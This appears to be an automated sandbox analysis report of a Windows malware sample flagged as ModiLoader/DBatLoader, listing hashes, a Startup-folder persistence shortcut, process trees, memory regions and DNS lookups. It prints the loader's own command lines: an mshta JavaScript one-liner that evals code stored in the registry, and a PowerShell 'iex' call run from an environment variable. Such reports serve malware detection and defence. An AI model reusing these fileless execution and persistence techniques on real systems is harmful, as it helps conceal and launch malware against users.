SHA1 0078bd4798af0b8a717425f1a85a1ff2a70c4c37
SHA256 0dc66bcd192c0da909958e43407fb9c4eb212c0471e715e32555f9399549255b
SHA512 8fd8d7af58ce744f505ec537830104bab71f86e87f7184bb6f0b699c8eed5f68ffd97211c435771b76aae94c8a74f782b656923c0f61f7189349b744d76f7dea

C:\Users\Admin\AppData\Roaming\e00a3efa\fe73a489.73caeeca8

MD5 e29d50165298aecb6e2acbadbce59342
SHA1 7904d2cce229b247ba13be33b1a7084516d5a8d1
SHA256 e498e261aa1a33bad74c37a65510381f011f35e3c70043345551dad676cc5524
SHA512 1a4de70ac3358bcdbe586e222037f18878aaf5ee495baeb04a1f4d44fa451f22ecbb5119a11a85c0a497265f12e961b62254ccd6ad04869778edee2714fd8689

C:\Users\Admin\AppData\Local\d3afae00\9a86c6c3.lnk

MD5 a92483561521734b6623cef20732fdd1
SHA1 04383522970e97d293cf512703c8f52b651b4034
SHA256 14fe397ec720047267c23536cb6cc73b911a54e1b09104a02e7f0dc0b5fbf8b7
SHA512 977e25381bf6c39334ffd9a21822168182a8d6d0357a70ab4f50ff8785bd9da9ff227e4cf240e55612faa0505a8061a8c165ea8afda8c1603d39150e1343bed8

C:\Users\Admin\AppData\Local\d3afae00\52d5d4d8.73caeeca8

MD5 2cacf5a4cfed3732b79f7ff60ae1e37c
SHA1 28d05477d8c337f3e8059b5a113038ed507c5543
SHA256 5685cbf2872de3a99bc488227def0e3ce23b213a4f69451c441fd7a6e24a2b3f
SHA512 da92f062f8cb4a1e1818e88d28446f79994cb797ece68f969917ed0fd223c3a7aaad50d4b175a9ad45dfc871ab62c448ce4f64a4a1c3e1a0105597b4c4c9160d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk

MD5 659f6c112b2f013e65491750969c0d01
SHA1 0335851b16792bfee657c1bf618b68d4161c35d3
SHA256 d81ea0121701e02daf3c4c8a33272ea0570aa38d838aa5bc1df21dd2e745353b
SHA512 b09d3c14d27b771b3c831c1fe7d321c08ea0864a42a6fa300000ea41331c0acd6bc8659865d173022a89f25f7c4defdadd48e28916ed4229b2a244b3b4701042

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-08 00:08

Reported

2024-05-08 00:10

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 2384 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe
PID 116 wrote to memory of 804 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 804 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 116 wrote to memory of 804 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\2255a6d2acb13100fa8a3c5f41c18e6a_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:ie9ROFH="MZmmo87";e2E7=new%20ActiveXObject("WScript.Shell");f4Afp="E";wh7im7=e2E7.RegRead("HKLM\\software\\Wow6432Node\\TsKfzBlpfX\\sJd7ke");ZX5iHe="MjLUmqKj";eval(wh7im7);O9rFdG6="B3AArkQF";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:zoaiio

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/4708-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4708-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4708-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4708-8-0x0000000000A60000-0x0000000000B36000-memory.dmp

memory/4708-10-0x0000000000A60000-0x0000000000B36000-memory.dmp

memory/4708-9-0x0000000000A60000-0x0000000000B36000-memory.dmp

memory/4708-7-0x0000000000A60000-0x0000000000B36000-memory.dmp

memory/4708-6-0x0000000000A60000-0x0000000000B36000-memory.dmp

memory/4708-11-0x0000000000A60000-0x0000000000B36000-memory.dmp

memory/4708-12-0x0000000000A60000-0x0000000000B36000-memory.dmp

memory/804-14-0x0000000004870000-0x00000000048A6000-memory.dmp

memory/804-15-0x0000000004EE0000-0x0000000005508000-memory.dmp

memory/804-16-0x0000000004E40000-0x0000000004E62000-memory.dmp

memory/804-17-0x0000000005640000-0x00000000056A6000-memory.dmp

memory/804-18-0x00000000056B0000-0x0000000005716000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhppubqr.0xk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/804-28-0x0000000005720000-0x0000000005A74000-memory.dmp

memory/804-29-0x0000000005C30000-0x0000000005C4E000-memory.dmp

memory/804-30-0x0000000005DB0000-0x0000000005DFC000-memory.dmp

memory/804-31-0x0000000007420000-0x0000000007A9A000-memory.dmp

memory/804-32-0x0000000006120000-0x000000000613A000-memory.dmp